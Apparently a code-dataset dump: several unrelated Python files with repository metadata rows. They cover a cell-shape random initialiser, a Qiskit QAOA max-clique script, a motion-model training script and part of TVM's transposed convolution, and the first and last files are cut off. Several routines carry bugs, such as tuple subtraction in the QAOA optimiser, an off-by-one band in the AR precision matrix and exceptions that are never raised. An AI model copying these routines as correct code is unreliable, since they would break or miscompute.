NewCellBendOverallLower,
NewCellBendOverallUpper,
NewCellBendUpperLower,
NewCellBendUpperUpper,
NewCellLength1Mean,
NewCellLength1Std,
NewCellLength2Mean,
NewCellLength2Std,
NewCellLengthAbsoluteMax,
NewCellLengthAbsoluteMin,
NewCellRadiusFromCenter,
NewCellWidthAbsoluteMax,
NewCellWidthAbsoluteMin,
NewCellWidthMean,
NewCellWidthStd,
Width,
)
from ..random import RRF, enforce_bounds
RandomSequenceType = Dict[str, Any]
class RandomWidthLength:
"""Random initializations for cell width/lengths."""
@staticmethod
def random_sequences(sequence: RRF) -> RandomSequenceType:
assert NewCellLength1Mean.value > NewCellWidthMean.value
assert NewCellLength2Mean.value > NewCellWidthMean.value
def ensure_length_greater_width(length, width):
for inner_length, inner_width in zip(length, width):
if inner_length > inner_width:
yield [inner_length, inner_width]
return dict(
length__width=RRF.chain(
ensure_length_greater_width,
length=RRF.compose(
lambda raw_lengths, choice: raw_lengths[choice],
raw_lengths=RRF.chain(
enforce_bounds,
iterator=sequence.multivariate_normal(
[NewCellLength1Mean.value, NewCellLength2Mean.value],
[
[NewCellLength1Std.value, 0.0],
[0.0, NewCellLength2Std.value],
],
),
minimum=NewCellLengthAbsoluteMin.value,
maximum=NewCellLengthAbsoluteMax.value,
),
choice=sequence.integers(0, 1),
),
width=RRF.chain(
enforce_bounds,
iterator=sequence.normal(
NewCellWidthMean.value, NewCellWidthStd.value
),
minimum=NewCellWidthAbsoluteMin.value,
maximum=NewCellWidthAbsoluteMax.value,
),
)
)
class RandomBentRod:
"""Random initializations for cell bent radii."""
@staticmethod
def random_sequences(sequence: RRF) -> RandomSequenceType:
return dict(
bend_overall=sequence.uniform(
NewCellBendOverallLower.value,
NewCellBendOverallUpper.value,
),
bend_upper=sequence.uniform(
NewCellBendUpperLower.value, NewCellBendUpperUpper.value
),
bend_lower=sequence.uniform(
NewCellBendLowerLower.value, NewCellBendLowerUpper.value
),
)
class RandomPosition:
"""Random initializations for cell positions."""
@staticmethod
def random_sequences(sequence: RRF) -> RandomSequenceType:
return dict(
position=RRF.compose(
lambda radius, angle: [
float(radius * np.cos(angle) + Width.value / 2),
float(radius * np.sin(angle) + Height.value / 2),
],
radius=sequence.uniform(0, NewCellRadiusFromCenter.value),
angle=RRF.wrap(sequence.uniform(0, 360.0), np.radians),
)
)
class RandomAngle:
"""Random initializations for cell angles."""
@staticmethod
def random_sequences(sequence: RRF) -> RandomSequenceType:
return dict(angle=RRF.wrap(sequence.uniform(0, 360.0), np.radians))
class RandomFluorescence:
"""Random initializations for fluorescences."""
@staticmethod
def random_sequences(sequence: RRF) -> RandomSequenceType:
return dict(fluorescences=sequence.uniform(0, 360.0, (1,)))
| 32.133858
| 81
| 0.589561
| 3,391
| 0.830924
| 1,656
| 0.405783
| 2,987
| 0.731928
| 0
| 0
| 285
| 0.069836
|
c4049f3019aff074a372d03e83e2c871a888286d
| 7,540
|
py
|
Python
|
QAOA_MaxClique.py
|
bernovie/QAOA-MaxClique
|
59b795480e019ae19d25ace274bdb86714ed49e2
|
[
"MIT"
] | 2
|
2020-06-19T06:58:11.000Z
|
2021-05-18T07:17:22.000Z
|
QAOA_MaxClique.py
|
bernovie/QAOA-MaxClique
|
59b795480e019ae19d25ace274bdb86714ed49e2
|
[
"MIT"
] | 1
|
2020-09-21T20:26:46.000Z
|
2020-09-21T20:26:46.000Z
|
QAOA_MaxClique.py
|
bernovie/QAOA-MaxClique
|
59b795480e019ae19d25ace274bdb86714ed49e2
|
[
"MIT"
] | 1
|
2020-09-20T12:42:02.000Z
|
2020-09-20T12:42:02.000Z
|
import qiskit
import numpy as np
import matplotlib.pyplot as plt
import json
from graph import *
# Random comment
P =1
def makeCircuit(inbits, outbits):
q = qiskit.QuantumRegister(inbits+outbits)
c = qiskit.ClassicalRegister(inbits+outbits)
qc = qiskit.QuantumCircuit(q, c)
q_input = [q[i] for i in range(outbits,outbits+inbits)]
q_output = [q[j] for j in range(outbits)]
return qc, c, q_input, q_output
# measure all qubits in q_input register, return dictionary of samples
def measureInput(qc, q_input, c):
for i in range(len(q_input)):
qc.measure(q_input[i], c[i])
job = qiskit.execute(qc, backend='local_qasm_simulator', shots=1024)
return job.result().get_counts(qc)
def test5(qc, q_input, c):
data = measureInput(qc, q_input, c)
# assemble data from dictionary into list
parsed = []
xticks = []
n = len(q_input)
for i in range(2**n):
bits = np.binary_repr(i, width=n)
xticks.append(bits)
bits += "00"
if bits in data: parsed.append(data[bits])
else: parsed.append(0)
plt.bar(range(2**n), parsed)
plt.xticks(range(2**n),xticks,rotation="vertical")
plt.xlabel('Outcomes')
plt.ylabel('Counts')
plt.title('Measurement Histogram')
plt.show()
def applyQAOA(gamma, beta, graph):
### INIT REGS
qc, c, q_input, q_output = makeCircuit(graph.getNumNodes(), 1);
PENALTY = graph.getMaxEdges()
### H on every input register
for node in q_input:
qc.h(node)
complement = graph.getEdgesComp();
edges = graph.getEdges()
### APPLY V AND W
### APPLY V
# EDGES IN THE GRAPH
for edge in edges:
nodeList = edge.getNodes()
qc.cu1(-gamma, q_input[nodeList[0].name], q_input[nodeList[1].name])
# EDGES NOT IN THE GRAPH
for edge in complement:
nodeList = edge.getNodes()
qc.cu1(PENALTY*gamma, q_input[nodeList[0].name], q_input[nodeList[1].name])
### APPLY W
for node in q_input:
qc.h(node)
qc.u1(2*beta, node)
qc.h(node)
### Measure
results = measureInput(qc, q_input, c)
### Compute the result expectation
### Parse the result list.
# B/c we only care about counts associated with input register
# we combine the counts of states with same input register bits
counts = dict()
for key in results:
if key[1:] not in counts:
counts[key[1:]] = results[key]
else:
counts[key[1:]] += results[key]
#print(counts)
eox = 0
eox2 = 0
for val in counts:
cliqNum = 0
for edge in edges:
nodeList = edge.getNodes()
#print("Node 1:", nodeList[0].name,"Node 2:", nodeList[1].name)
if val[nodeList[0].name] == '1' and val[nodeList[1].name] == '1':
cliqNum += 1
for edge in complement:
nodeList = edge.getNodes()
if val[nodeList[0].name] == '1' and val[nodeList[1].name] == '1':
cliqNum -= PENALTY
eox += counts[val]/1024 * cliqNum
eox2 += (cliqNum**2) * counts[val]/1024
std = np.sqrt((len(counts)/(len(counts) -1))*(eox2 - eox**2))
return eox, std
### gradient ascent optimizer
# graph is graph to optimize over
# epsilon controls how far out the delta is calculated
# eta is learning rate
# threshold is the average of gamma and beta that we will consider a max
def optimize(graph, epsilon, eta, threshold):
count = 0
gamma = 2
beta = 2
dgamma = (applyQAOA(gamma + epsilon, beta, graph) - applyQAOA(gamma - epsilon, beta, graph))/(2*epsilon)
dbeta = (applyQAOA(gamma, beta + epsilon, graph) - applyQAOA(gamma, beta + epsilon, graph))/(2*epsilon)
flipper = True #Alternate between maxing gamma and maxing beta
while((abs(dgamma) + abs(dbeta))/2 > threshold):
if(flipper):
if (dgamma > 0):
gamma = (gamma + (dgamma * eta)) % (2*np.pi)
elif (dgamma < 0):
gamma = (gamma - (dgamma * eta)) % (2*np.pi)
dgamma = (applyQAOA(gamma + epsilon, beta, graph) - applyQAOA(gamma - epsilon, beta, graph))/(2*epsilon)
else:
if(dbeta > 0):
beta = (beta + (dbeta * eta)) % np.pi
elif (dbeta < 0):
beta = (beta - (dbeta * eta)) % np.pi
dbeta = (applyQAOA(gamma, beta + epsilon, graph) - applyQAOA(gamma, beta + epsilon, graph))/(2*epsilon)
count+=1
print("Count", count, "dg", dgamma, "db", dbeta)
flipper = not flipper
print(count)
return gamma, beta
def main():
###TESTING GRAPH
#0---1
#| / |
#3---2
myGraph = Graph(0, 0)
nodes = [Node(i) for i in range(4)]
edges = []
edges.append(Edge(nodes[0], nodes[1]))
edges.append(Edge(nodes[1], nodes[2]))
edges.append(Edge(nodes[2], nodes[3]))
edges.append(Edge(nodes[3], nodes[0]))
edges.append(Edge(nodes[3], nodes[1]))
for n in nodes:
myGraph.addNode(n)
for e in edges:
myGraph.addEdge(e)
### Run the algorithm
#expect = applyQAOA(gamma, beta, myGraph)
#print("Expectation Value:", expect)
### OPTIMIZE
#bestGamma, bestBeta = optimize(myGraph, 0.1, 0.1, 0.05)
#print("BestGamma: ", bestGamma, "bestBeta", bestBeta)
#print("Optimized Expectation value", applyQAOA(bestGamma, bestBeta, myGraph))
#print("Optimal Gamma:", bestGamma, "Optimal Beta:", bestBeta)
#BestGamma: 4.6015625 bestBeta 0.18702062766020688
#Optimized Expectation value -0.3115234375
### Make graphs.
# I'm thinking we hold one variable constant at its maxed value
# and vary the other and vice versa.
# Gamma has a larger range than beta. Do we want more data points for gamma than beta?
# The last page of the worksheet says exactly which graphs we need in our report
# so make sure we have at least those
BestGamma = 4.6015625
BestBeta = 0.18702062766020688
betas = np.linspace(0, np.pi, 10)
gammas = np.linspace(0, 2*np.pi, 100)
varyingBeta = []
varyingGamma = []
betaSTD = []
gammaSTD = []
y = []
std = []
for gammaa in gammas:
e, s = applyQAOA(gammaa, BestBeta, myGraph)
y.append(e)
std.append(s)
with open("varyingGamma.txt", 'w') as f:
json.dump(y, f)
with open("gammaSTD.txt", 'w') as f:
json.dump(std, f)
"""
y = []
std = []
for betaa in betas:
e, s = applyQAOA(BestGamma, betaa, myGraph)
y.append(e)
std.append(s)
with open("varyingBeta.txt", 'w') as f:
json.dump(y, f)
with open("betaSTD.txt", 'w') as f:
json.dump(std, f)
"""
with open("varyingGamma.txt", 'r') as f:
varyingGamma = json.load(f)
#with open("varyingBeta.txt", 'r') as f:
# varyingBeta = json.load(f)
#with open("betaSTD.txt", 'r') as f:
# betaSTD = json.load(f)
with open("gammaSTD.txt", 'r') as f:
gammaSTD = json.load(f)
#betaG = plt.errorbar(betas, varyingBeta, betaSTD, ecolor='black', elinewidth = 0.5, capsize=3)
gammaG = plt.errorbar(gammas, varyingGamma, gammaSTD, ecolor='black', elinewidth = 0.5, capsize=3)
plt.legend(('Gamma Graph',))
plt.xlabel('Gamma values')
plt.ylabel('Expectation Value')
plt.title('Expectation Value vs Gamma holding Beta constant')
plt.show()
main()
| 31.157025
| 116
| 0.589125
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 2,395
| 0.317639
|
c406c0be47fb741172f1a8941c81701c0d28eb02
| 253
|
py
|
Python
|
yakut/cmd/file_server/__init__.py
|
pavel-kirienko/un
|
996e64668d8902bd876fab16b64e3361094a674d
|
[
"MIT"
] | 1
|
2020-12-23T22:59:12.000Z
|
2020-12-23T22:59:12.000Z
|
yakut/cmd/file_server/__init__.py
|
pavel-kirienko/un
|
996e64668d8902bd876fab16b64e3361094a674d
|
[
"MIT"
] | null | null | null |
yakut/cmd/file_server/__init__.py
|
pavel-kirienko/un
|
996e64668d8902bd876fab16b64e3361094a674d
|
[
"MIT"
] | null | null | null |
# Copyright (c) 2021 OpenCyphal
# This software is distributed under the terms of the MIT License.
# Author: Pavel Kirienko <pavel@opencyphal.org>
from ._app_descriptor import AppDescriptor as AppDescriptor
from ._cmd import file_server as file_server
| 36.142857
| 66
| 0.810277
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 144
| 0.56917
|
c407355017835f143ce6a0c84504a53fa41a83ee
| 15,959
|
py
|
Python
|
src/learn_mtfixbmodel.py
|
ornithos/pytorch-mtds-mocap
|
3ec10387d3d897e9a20d789bd4a3782a047519f7
|
[
"MIT"
] | 2
|
2022-02-09T17:53:31.000Z
|
2022-03-02T11:25:35.000Z
|
src/learn_mtfixbmodel.py
|
ornithos/pytorch-mtds-mocap
|
3ec10387d3d897e9a20d789bd4a3782a047519f7
|
[
"MIT"
] | null | null | null |
src/learn_mtfixbmodel.py
|
ornithos/pytorch-mtds-mocap
|
3ec10387d3d897e9a20d789bd4a3782a047519f7
|
[
"MIT"
] | null | null | null |
"""Simple code for training an RNN for motion prediction."""
import os
import sys
import time
import numpy as np
import torch
import torch.optim as optim
from torch.autograd import Variable
import mtfixb_model
import mtfixb_model2
import parseopts
def create_model(args, total_num_batches):
"""Create MT model and initialize or load parameters in session."""
if len(args.load) > 0:
print("Loading model")
model = torch.load(args.load, map_location="cpu") if args.use_cpu else torch.load(args.load)
return model
if args.k == 0:
return create_model_k0(args, total_num_batches)
if args.dynamicsdict:
return create_model_DD(args, total_num_batches)
if args.biasonly:
return create_model_BiasOnly(args, total_num_batches)
if args.nobias:
return create_model_NoMTBias(args, total_num_batches)
model = mtfixb_model.MTGRU(
args.seq_length_out,
args.decoder_size,
args.decoder_size2,
args.batch_size,
total_num_batches,
args.k,
args.size_psi_hidden,
args.size_psi_lowrank,
args.bottleneck,
output_dim=args.human_size,
input_dim=args.input_size,
dropout=args.dropout_p,
residual_output=args.residual_velocities,
init_state_noise=args.init_state_noise,
mt_rnn=args.mt_rnn,
psi_affine=args.psi_affine,
)
if len(args.load) <= 0:
if len(args.load_layer1) > 0:
print("Loading GRU2 model")
model = load_layer1(model, args.load_layer1, args.use_cpu)
return model
print("Loading model")
model = torch.load(args.load, map_location="cpu") if args.use_cpu else torch.load(args.load)
return model
def create_model_k0(args, total_num_batches):
"""Create MT model and initialize or load parameters in session."""
model = mtfixb_model.OpenLoopGRU(
args.seq_length_out,
args.decoder_size,
args.batch_size,
args.human_size,
args.input_size,
args.dropout_p,
args.residual_velocities,
args.init_state_noise,
)
return model
def create_model_DD(args, total_num_batches):
"""Create MT model and initialize or load parameters in session."""
if len(args.load_layer1) > 0:
NotImplementedError("Layer 1 load not yet implemented for Dynamics Dict.")
model = mtfixb_model.DynamicsDict(
args.seq_length_out,
args.decoder_size,
total_num_batches,
args.batch_size,
args.k,
args.size_psi_hidden,
args.size_psi_lowrank,
args.human_size,
args.input_size,
args.dropout_p,
args.residual_velocities,
args.init_state_noise,
)
return model
def create_model_BiasOnly(args, total_num_batches):
"""Create MT model and initialize or load parameters in session."""
if len(args.load_layer1) > 0:
NotImplementedError("Layer 1 load not yet implemented for MT Bias Only.")
model = mtfixb_model.MTGRU_BiasOnly(
args.seq_length_out,
args.decoder_size,
args.decoder_size2,
args.batch_size,
total_num_batches,
args.k,
args.size_psi_hidden,
args.size_psi_lowrank,
args.bottleneck,
output_dim=args.human_size,
input_dim=args.input_size,
dropout=args.dropout_p,
residual_output=args.residual_velocities,
init_state_noise=args.init_state_noise,
)
return model
def create_model_NoMTBias(args, total_num_batches):
"""Create MT model and initialize or load parameters in session."""
if len(args.load_layer1) > 0:
NotImplementedError("Layer 1 load not yet implemented for MT Bias Only.")
model = mtfixb_model2.MTGRU_NoBias(
args.seq_length_out,
args.decoder_size,
args.decoder_size2,
args.batch_size,
total_num_batches,
args.k,
args.size_psi_hidden,
args.size_psi_lowrank,
args.bottleneck,
output_dim=args.human_size,
input_dim=args.input_size,
dropout=args.dropout_p,
residual_output=args.residual_velocities,
init_state_noise=args.init_state_noise,
mt_rnn=args.mt_rnn,
psi_affine=args.psi_affine,
)
return model
def train(args):
"""Train a MT model on human motion"""
train_iter = read_all_data(args)
train_iter.shuffle()
total_num_batches = train_iter.total_length()
model = create_model(args, total_num_batches)
model = model if args.use_cpu else model.cuda()
has_weight = not np.isclose(args.first3_prec, 1.0)
is_hard_em = args.hard_em_iters > 0
is_MT = args.k > 0
current_step = 0
previous_losses = []
step_time, loss = 0, 0
mt_lr = args.learning_rate_mt if args.learning_rate_mt >= 0 else args.learning_rate
z_lr = args.learning_rate_z if args.learning_rate_z >= 0 else args.learning_rate
zls_lr = 0 if is_hard_em else z_lr
pars_lrs, zls_ix = model.get_params_optim_dicts(mt_lr, args.learning_rate, z_lr, zls_lr=zls_lr)
if args.optimiser.upper() == "SGD":
optimiser = optim.SGD(pars_lrs, weight_decay=args.weight_decay)
elif args.optimiser.upper() == "NESTEROV":
optimiser = optim.SGD(pars_lrs, momentum=0.8, nesterov=True, weight_decay=args.weight_decay)
elif args.optimiser.upper() == "ADAM":
optimiser = optim.Adam(pars_lrs, betas=(0.9, 0.999), weight_decay=args.weight_decay)
else:
Exception("Unknown optimiser type: {:d}. Try 'SGD', 'Nesterov' or 'Adam'")
has_ar_noise = args.ar_coef > 0
device = "cpu" if args.use_cpu else "cuda"
if has_ar_noise:
assert args.ar_coef < 1, "ar_coef must be in [0, 1)."
# Construct banded AR precision matrix (fn def below)
Prec = ar_prec_matrix(args.ar_coef, args.seq_length_out).float().to(device)
for _ in range(args.iterations):
optimiser.zero_grad()
model.train()
start_time = time.time()
# ------------------------------------------------------- TRAINING
inputs, outputs, c_ids = model.get_batch(train_iter)
inputs, outputs = torchify(inputs, outputs, device=device)
if is_MT:
mu = model.mt_net.Z_mu[c_ids, :]
sd = torch.sigmoid(3 * model.mt_net.Z_logit_s[c_ids, :])
preds, _state = model(inputs, mu, sd)
else:
preds, _state = model(inputs)
err = preds - outputs
if has_weight:
err = err * torch.cat(
(torch.ones(1, 1, 3) * np.sqrt(args.first3_prec), torch.ones(1, 1, args.human_size - 3)), dim=2
).to(err.device)
if not has_ar_noise:
sqerr = err ** 2
else:
sqerr = (Prec @ err) * err
step_loss = args.human_size * args.seq_length_out * sqerr.mean() / 2
# assume \sigma is const. wrt optimisation, and hence normalising constant can be ignored.
# Now for KL term. Since we're descending *negative* L.B., we need to *ADD* KL to loss:
if is_MT:
logstd = torch.log(sd)
KLD = -0.5 * torch.sum(1 + 2 * logstd - mu.pow(2) - torch.exp(2 * logstd))
step_loss = step_loss + KLD
# Actual backpropagation
step_loss.backward()
optimiser.step()
# -------------------------------------------------------
# Reporting / admin
step_loss = step_loss.cpu().data.numpy()
if current_step % 10 == 0:
if is_MT:
KLD_part = KLD.cpu().data.numpy()
print(
"step {0:04d}; step_loss: {1:.4f} ({2:.4f})".format(current_step, step_loss, step_loss - KLD_part)
)
else:
print("step {0:04d}; step_loss: {1:.4f}".format(current_step, step_loss))
step_time += (time.time() - start_time) / args.test_every
loss += step_loss / args.test_every
current_step += 1
if current_step % 20 == 0:
sys.stdout.flush()
# Decay learning rate (if appl.)
if current_step % args.learning_rate_step == 0:
for param_group in optimiser.param_groups:
param_group["lr"] *= args.learning_rate_decay_factor
print("Decay learning rate. New value at " + str(optimiser.param_groups[0]["lr"]))
# remove Hard EM spec (if appl.)
if is_hard_em and zls_ix is not None and current_step == args.hard_em_iters:
optimiser.param_groups[zls_ix]["lr"] = z_lr
model.standardise_aggregate_posterior()
# Once in a while, we save checkpoint, print statistics, and run evals.
if current_step % args.test_every == 0:
model.eval()
# === CANNOT DO TEST SET EVALUATION SINCE DONT KNOW LATENT Z ===
# inputs, outputs = model.get_test_batch(test_set_Y, test_set_U, -1)
# inputs, outputs = torchify(inputs, outputs, device=device)
#
# if is_MT:
# preds, state = model(inputs, mu, sd)
# else:
# preds = model(inputs)
#
# err = (preds - outputs)
# if has_weight:
# err = err * torch.cat((torch.ones(1, 1, 3) * np.sqrt(args.first3_prec),
# torch.ones(1, 1, args.human_size - 3)), dim=2).to(err.device)
#
# if not has_ar_noise:
# sqerr = err ** 2
# else:
# Prec_test = ar_prec_matrix(args.ar_coef, err.size(1)).float().to(device)
# sqerr = (Prec_test @ err) * err
#
# val_loss = args.human_size * args.seq_length_out * sqerr.mean() / 2
#
# if is_MT:
# logstd = torch.log(sd)
# KLD = -0.5 * torch.sum(1 + 2 * logstd - mu.pow(2) - torch.exp(2 * logstd))
# val_loss = val_loss + KLD
#
# print()
# print("{0: <16} |".format("milliseconds"), end="")
# for ms in [60, 240, 480, 750, 990, 1500, 2010]:
# print(" {0:5d} |".format(ms), end="")
# print()
#
# avg_mse_tt = sqerr.detach().cpu().mean(dim=0).numpy().mean(axis=1)
# Pretty print of the results for 60, 240, 480, 750, 990, 1500, 2010 ms
# print("{0: <16} |".format(" "), end="")
# for ms in [1, 7, 15, 24, 32, 49, 66]:
# if args.seq_length_out >= ms + 1:
# print(" {0:.3f} |".format(avg_mse_tt[ms]), end="")
# else:
# print(" n/a |", end="")
# print()
#
# print()
# print("============================\n"
# "Global step: %d\n"
# "Learning rate: %.4f\n"
# "Step-time (ms): %.4f\n"
# "Train loss avg: %.4f\n"
# "--------------------------\n"
# "Test loss: %.4f\n"
# "============================" % (current_step,
# args.learning_rate, step_time * 1000, loss,
# val_loss))
torch.save(model, args.train_dir + "/model_" + str(current_step))
# print()
previous_losses.append(loss)
# Reset global time and loss
step_time, loss = 0, 0
sys.stdout.flush()
def sample(args):
raise NotImplementedError("Sampling not yet implemented: unsure how to deal with unknown latent z.")
train_set_Y, train_set_U, test_set_Y, test_set_U = read_all_data(args)
model = create_model(args)
model.eval()
if not args.use_cpu:
model = model.cuda()
print("Model created")
inputs, outputs = model.get_test_batch(test_set_Y, test_set_U, -1)
inputs = Variable(torch.from_numpy(inputs).float())
outputs = Variable(torch.from_numpy(outputs).float())
if not args.use_cpu:
inputs, outputs, inputs.cuda(), outputs.cuda()
if args.k > 0:
preds, mu, logstd, state = model(inputs, outputs)
else:
preds = model(inputs)
loss = (preds - outputs) ** 2
loss.cpu().data.numpy()
loss = loss.mean()
preds = preds.cpu().data.numpy()
preds = preds.transpose([1, 0, 2])
loss = loss.cpu().data.numpy()
np.savez("mt_predictions_{0}.npz".format(args.style_ix), preds=preds, actual=outputs)
return
def ar_prec_matrix(rho, n):
# Banded covariance construction
Prec = np.zeros((n, n))
i, j = np.indices(Prec.shape)
Prec[i == j] = 1 + rho ** 2
Prec[i == j - 1] = -rho
Prec[i == j + 2] = -rho
return torch.tensor(Prec)
def load_layer1(model, layer1_filename, use_cpu):
model_gru1 = torch.load(layer1_filename, map_location="cpu") if use_cpu else torch.load(layer1_filename)
if isinstance(model_gru1, mtfixb_model.OpenLoopGRU):
model.layer1_rnn = model_gru1.rnn
# model.layer1_linear = model_gru2.emission
else:
model.layer1_rnn = model_gru1.rnn2
return model
def read_all_data(args):
"""
Loads data for training/testing and normalizes it.
Args
data_dir: directory to load the data from
style_ix: style index of the test set (and leave out from the training set)
njoints: number of joints to model (0 or -1 = all)
Returns
train_set: dictionary with normalized training data
test_set: dictionary with test data
data_mean: d-long vector with the mean of the training data
data_std: d-long vector with the standard dev of the training data
dim_to_ignore: dimensions that are not used becaused stdev is too small
dim_to_use: dimensions that we are actually using in the model
"""
# === Read training data ===
print("Reading training data (test index {0:d}).".format(args.style_ix))
njoints = args.human_size
if not args.train_set_size == -1:
style_lkp = {
str(i): range(1 + args.train_set_size * (i - 1), 1 + args.train_set_size * i) for i in range(1, 8 + 1)
}
else:
style_lkp = np.load(os.path.join(args.data_dir, args.stylelkp_fname))
train_set_Y = np.load(os.path.join(args.data_dir, args.output_fname))
train_set_U = np.load(os.path.join(args.data_dir, args.input_fname))
njoints = train_set_Y[str(0)].shape[1] if njoints <= 0 else njoints
if args.train_set_size != 0:
train_ixs = np.concatenate(
[
style_lkp[str(i)] for i in range(1, len(style_lkp.keys()) + 1) if i != args.style_ix
] # CAREFUL: jl is 1-based!
)
train_set_Y = [train_set_Y[str(i)][:, :njoints] for i in train_ixs]
train_set_U = [train_set_U[str(i)] for i in train_ixs]
else:
assert args.style_ix not in range(1, 9), "no support for LOO experiments with max MTL data yet. Use style_ix=9"
train_set_Y = [train_set_Y[str(i + 1)][:, :njoints] for i in range(len(train_set_Y))]
train_set_U = [train_set_U[str(i + 1)] for i in range(len(train_set_U))]
print("Using files {:s}; {:s}".format(args.input_fname, args.output_fname))
print("done reading data.")
return mtfixb_model.DataIterator(train_set_Y, train_set_U, 64, min_size=64, overlap2=args.overlap_windows)
def torchify(*args, device="cpu"):
return [Variable(torch.from_numpy(arg).float()).to(device) for arg in args]
def main(args=None):
args = parseopts.parse_args(args)
args = parseopts.initial_arg_transform(args)
print(args.train_dir)
os.makedirs(args.train_dir, exist_ok=True)
if args.sample:
sample(args)
else:
train(args)
return args
if __name__ == "__main__":
main()
| 33.739958
| 119
| 0.59208
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 4,431
| 0.277649
|
c408095eb7ab9da191765321215bacfdbf223067
| 11,260
|
py
|
Python
|
python/tvm/topi/nn/conv2d_transpose.py
|
ccjoechou/tvm
|
779dc51e1332f417fa4c304b595ce76891dfc33a
|
[
"Apache-2.0"
] | 4
|
2020-04-14T12:31:45.000Z
|
2020-11-02T14:20:59.000Z
|
python/tvm/topi/nn/conv2d_transpose.py
|
ccjoechou/tvm
|
779dc51e1332f417fa4c304b595ce76891dfc33a
|
[
"Apache-2.0"
] | null | null | null |
python/tvm/topi/nn/conv2d_transpose.py
|
ccjoechou/tvm
|
779dc51e1332f417fa4c304b595ce76891dfc33a
|
[
"Apache-2.0"
] | 1
|
2020-11-02T14:21:45.000Z
|
2020-11-02T14:21:45.000Z
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
# pylint: disable=invalid-name, unused-variable, unused-argument
"""Transposed 2D convolution operators (sometimes called Deconvolution)."""
import collections
import tvm
from tvm import relay, te
from ..utils import simplify
from .dilate import dilate
from .pad import pad
from .utils import get_pad_tuple
def _ntuple(n):
def parse(x):
if isinstance(x, collections.abc.Iterable):
assert len(x) == n, f"Input can only have {n} elements, but got {len(x)} instead: {x}."
return x
return tuple(repeat(x, n))
return parse
_single = _ntuple(1)
_pair = _ntuple(2)
_triple = _ntuple(3)
_quadruple = _ntuple(4)
def conv2d_transpose_nchw(Input, Filter, strides, padding, out_dtype, output_padding):
"""Transposed 2D convolution nchw forward operator.
Parameters
----------
Input : tvm.te.Tensor
4-D with shape [batch, in_channel, in_height, in_width]
Filter : tvm.te.Tensor
4-D with shape [in_channel, num_filter, filter_height, filter_width]
strides : tuple of two ints
The spatial stride along height and width
padding : int or str
Padding size, or ['VALID', 'SAME']
out_dtype : str
The output data type. This is used for mixed precision.
output_padding : tuple of ints
Used to get the right output shape for gradients
Returns
-------
Output : tvm.te.Tensor
4-D with shape [batch, out_channel, out_height, out_width]
"""
return declaration_conv2d_transpose_impl(
Input, Filter, strides, padding, out_dtype, output_padding=output_padding
)
def conv2d_transpose_nchw_preprocess(data, kernel, strides, padding, out_dtype, output_padding):
"""Preprocess data and kernel to make the compute pattern
of conv2d_transpose the same as conv2d"""
batch, in_c, in_h, in_w = data.shape
_, out_c, filter_h, filter_w = kernel.shape
stride_h, stride_w = strides
opad_h, opad_w = output_padding
assert opad_h < stride_h and opad_w < stride_w
# dilate data
data_dilate = dilate(data, [1, 1, stride_h, stride_w], name="data_dilate")
# pad data
fpad_top, fpad_left, fpad_bottom, fpad_right = get_pad_tuple(padding, (filter_h, filter_w))
bpad_top = filter_h - 1 - fpad_top
bpad_bottom = filter_h - 1 - fpad_bottom + opad_h
bpad_left = filter_w - 1 - fpad_left
bpad_right = filter_w - 1 - fpad_right + opad_w
data_pad = pad(
data_dilate, [0, 0, bpad_top, bpad_left], [0, 0, bpad_bottom, bpad_right], name="data_pad"
)
# transform kernel layout from IOHW to OIHW, and rotate kernel by 180 degrees
kernel_transform = te.compute(
(out_c, in_c, filter_h, filter_w),
lambda o, i, h, w: kernel[i][o][filter_h - 1 - h][filter_w - 1 - w],
name="kernel_transform",
)
return data_pad, kernel_transform
def declaration_conv2d_transpose_impl(data, kernel, strides, padding, out_dtype, output_padding):
"""Implementation of conv2d transpose"""
data_pad, kernel_transform = conv2d_transpose_nchw_preprocess(
data, kernel, strides, padding, out_dtype, output_padding
)
batch, in_c, in_h, in_w = data_pad.shape
out_c, _, filter_h, filter_w = kernel_transform.shape
# convolution stage
out_c = simplify(out_c)
out_h = simplify(in_h - filter_h + 1)
out_w = simplify(in_w - filter_w + 1)
dc = te.reduce_axis((0, in_c), name="dc")
dh = te.reduce_axis((0, filter_h), name="dh")
dw = te.reduce_axis((0, filter_w), name="dw")
Output = te.compute(
(batch, out_c, out_h, out_w),
lambda b, c, h, w: te.sum(
data_pad[b, dc, h + dh, w + dw].astype(out_dtype)
* kernel_transform[c, dc, dh, dw].astype(out_dtype),
axis=[dc, dh, dw],
),
tag="conv2d_transpose_nchw",
)
return Output
def group_conv2d_transpose_nchw(data, kernel, stride, padding, out_dtype, output_padding, groups):
"""Group convolution operator in NCHW layout.
Parameters
----------
data : tvm.te.Tensor
4-D with shape [batch, in_channel, in_height, in_width]
kernel : tvm.te.Tensor
4-D with shape [in_channel, out_channel // groups, filter_height, filter_width]
stride : int or a list/tuple of two ints
Stride size, or [stride_height, stride_width]
padding : int or a list/tuple of 2 or 4 ints
padding size, or
[pad_height, pad_width] for 2 ints, or
[pad_top, pad_left, pad_bottom, pad_right] for 4 ints
out_dtype : str
The output data type. This is used for mixed precision.
output_padding : tuple of ints
Used to get the right output shape for gradients
groups : int
number of groups
out_dtype : str
The output type. This is used for mixed precision.
Returns
-------
Output : tvm.te.Tensor
4-D with shape [batch, out_channel, out_height, out_width]
"""
if groups == 1:
return conv2d_transpose_nchw(data, kernel, stride, padding, out_dtype, output_padding)
# some pre-processing and prelimnary checks
if out_dtype is None:
out_dtype = data.dtype
batch, in_channels, in_h, in_w = data.shape
_, out_c, filter_h, filter_w = kernel.shape
assert (
in_channels % groups == 0
), f"input channels {in_channels} must divide group size {groups}"
# assert out_c % groups == 0, f"output channels {in_c} must divide group size {groups}"
strides = _pair(stride)
# padding = _pair(padding)
# output_padding = _pair(output_padding)
# dilation = _pair(dilation)
stride_h, stride_w = strides
opad_h, opad_w = output_padding
assert (
opad_h < stride_h and opad_w < stride_w
), f"[{output_padding}] opad_h:{opad_h} < stride_h:{stride_h} \
